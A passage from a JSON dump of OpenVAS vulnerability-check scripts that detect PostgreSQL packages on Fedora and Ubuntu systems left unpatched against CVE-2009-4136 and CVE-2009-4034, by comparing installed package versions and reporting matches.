30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-13381 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:05:13", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-876-1", "modified": "2018-01-17T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840360", "id": "OPENVAS:1361412562310840360", "title": "Ubuntu Update for PostgreSQL vulnerabilities USN-876-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_876_1.nasl 8440 2018-01-17 07:58:46Z teissa $\n#\n# Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that PostgreSQL did not properly handle certificates with\n NULL characters in the Common Name field of X.509 certificates. An attacker\n could exploit this to perform a man in the middle attack to view sensitive\n information or alter encrypted communications. (CVE-2009-4034)\n\n It was discovered that PostgreSQL did not properly manage session-local\n state. A remote authenticated user could exploit this to escalate\n priviliges within PostgreSQL. (CVE-2009-4136)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-876-1\";\ntag_affected = \"PostgreSQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-876-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840360\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"876-1\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_name(\"Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg5\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq4\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066566", "id": "OPENVAS:136141256231066566", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-13363 (postgresql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13363.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13363 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.3.9-1\n- Update to PostgreSQL 8.3.9, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-9.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13363\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66566\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-13363 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", 